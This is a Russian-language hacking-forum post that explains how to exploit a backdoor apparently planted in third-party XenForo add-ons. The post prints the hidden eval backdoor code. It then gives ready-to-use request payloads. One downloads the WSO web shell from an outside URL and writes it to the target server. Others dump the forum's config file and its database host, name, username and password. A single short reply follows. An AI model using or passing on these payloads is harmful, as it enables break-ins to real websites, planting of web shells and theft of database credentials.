1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Взлом XenForo старым багом в аддоне

Тема в разделе "Чужие", создана пользователем BoberMod, 1 июн 2015.

  1. TopicStarter Overlay
    BoberMod

    BoberMod Временно недоступен

    Регистрация:
    11 окт 2013
    Сообщения:
    571
    Симпатии:
    539
    Hello World друзья, в данной теме я вкратце постараюсь обьяснить как ломать Xen багом в аддонах от естетик, автор специально залил в свои аддоны шелл вида:
    Код:
    $request = new Zend_Controller_Request_Http ( ); // создается новый объект, отражающий текущий запрос
    if ($request->getParam('filter')) { // проверка наличия параметра filter в запросе
    $_request = $request->getParam('filter');
    switch (md5 ($_request)) { // этот filter хешируется, и на основе хеша  case '54626eee0bcb90ab43c7917eb49f2344': // хеш какой-то строки case     'a6746afee9fa4e6e4901943d47f272bf': // хеш какой-то другой строки
    /** * Удаление меток bb-кодов, опредеяющих сообщения текущего пользователя(дляотображения скрытого контента своих сообщений)
    */
    $request = preg_replace_callback ('/query/', create_function ('$matches', $_request), $_request); // нихуя не удаление меток, тут из filter'а берется код и из него создается функция, затем используется как каллбек для preg_replace_callback
    break;
    default: $request = 'all'; // хренота для наеба, если кто-то вдруг начнет копать }
    }
    Юзать данный шелл очень даже просто.
    Например:
    Please login or register to view links
    Как видим к урлу любой темы подставляется:
    Код:
    ?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die('yes');
    Если форум уязвим появится надпись yes, выведеная php командой Die

    Теперь напишу несколько боевых кодов:
    Код:
    ?filter=$request=new+Zend_Controller_Request_Http();eval($request->getParam("query"));&query=$url = "https://wso-web-shell-2-8.googlecode.com/svn/WSO2.8.php";$content = file_get_contents($url);$h = fopen("shells.php","w");$text = "$content";fwrite($h,$text);fclose($h);
    После исполнения кода, если позволяют права, шелл будет доступен по адресу : форум.com/shells.php
    Код:
    ?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=echo%20file_get_contents(%22./library/config.php%22);%20exit();
    Но способ выше может не работать.
    Если он не работает юзаем:
    Код:
    ?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=include './library/config.php';die( $config['db']['host']);
    При данном коде покажется хост базы данных.
    Для просмотра других данных меняем:
    host на:
    • dbname - имя базы
    • password - пароль юзера
    • username - юзер
    Вобщем если вы умелый PHP кодер то поняли что, после &query= идет пхп код.
    Т.е
    Код:
    ?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=здесь пхп код
    Please login or register to view links.
    -
    Как пофиксить -Please login or register to view links
    Copyright (c) K_NOW
    runhack.ru
     
    • Like Like x 8
    Метки:
  2. Crash0w3r

    Crash0w3r Head Guru

    Регистрация:
    12 май 2012
    Сообщения:
    380
    Симпатии:
    262
    Что теперь будете плодить одну тему на всех бордах >< Ладно хоть дыра не ксена и то радует, надо изредка просто проверять что ставите.
     

Поделиться этой страницей

Загрузка...